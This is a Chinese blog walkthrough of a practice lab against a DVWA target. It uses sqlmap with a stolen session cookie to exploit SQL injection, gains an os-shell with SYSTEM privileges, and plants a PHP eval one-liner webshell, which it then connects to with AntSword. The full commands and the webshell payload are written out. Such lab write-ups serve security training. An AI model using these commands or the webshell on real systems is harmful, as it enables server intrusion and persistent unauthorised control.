【渗透练习系列】DVWA的一次登录后通过Sqlmap拿到os-shell,命令执行写入一句话-01

一、前言

本次将通过DVWA靶机来展示怎样通过Sqlmap获取目标os-shell,得到命令执行权限,从而写入一句话木马,持续控制目标服务器。

二、测试

1.打开目标站点:http://192.200.30.126/DVWA/login.php,从网页后缀和wappalyzer浏览器插件来看,站点的编程语言为PHP。
在这里插入图片描述2.输入账号跟密码登录后台,同时开启Burp抓取http包。
获取登录后的Cookie值:
在这里插入图片描述3.找到存在SQL注入的模块。获取URL。

http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

在这里插入图片描述4.由于该页面是登录后,不能直接用SQLMAP跑,需要加入Cookie来注入。构造如下命令:

sqlmap.py -u "http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=43teu289ku4vi8g9updhua57o3" --batch

在这里插入图片描述这里可以看到是存在数字型注入的,可通过’–+进行闭合。

5.直接通过手工注入,爆出数据库路径为D:\phpstudy_pro\Extensions\MySQL5.7.26
看到站点通过phpstudy搭建,猜测web路径为:D:\phpstudy_pro\WWW
【注意】:通过sqlmap获取os-shell,需要知道站点的绝对路径。
在这里插入图片描述6.直接通过SQLMAP加载os-shell。执行如下命令:

sqlmap.py -u "http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=43teu289ku4vi8g9updhua57o3" --os-shell

在这里插入图片描述1).第一个选择,首先选择web支持的脚本语言。(之前已经知道网站是PHP语言,)
2).第二个选择,您希望sqlmap进一步尝试揭示完整路径吗? Y
3).第三个选择,302重定向到目标URL。 你想跟上吗? Y
4).第四个选择,你提供了一个HTTP Cookie头值,而目标URL在与你的Cookie头相交的HTTP Set-Cookie头中提供了自己的Cookie。 是否要在进一步的请求中合并它们? n
5).第五个选择,你想用什么作为可写目录?
[1] 常用路径枚举
[2]自定义路径
[3] 自定义枚举字典
[4] 蛮力枚举路径

这里选择2,使用之前猜测的web路径:D:\phpstudy_pro\WWW\,不过这里需要使用反斜杠:D:/phpstudy_pro/WWW/

7.获取到os-shell后,直接命令执行whoami,发现直接是system权限。
在这里插入图片描述
8.通过dir获取当前路径,D:\phpstudy_pro\WWW\路径下确实是DVWA网站的web路径。
在这里插入图片描述
9.直接通过echo写入一句话PHP木马,写入到web的根路径下。这里敲完命令就直接按回车。

echo "<?php @eval($_POST["shell"]);?>" > shell.php

在这里插入图片描述
10.直接通过蚁剑连接,测试连接成功。成功获取目标站点管理权限。
在这里插入图片描述在这里插入图片描述

  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值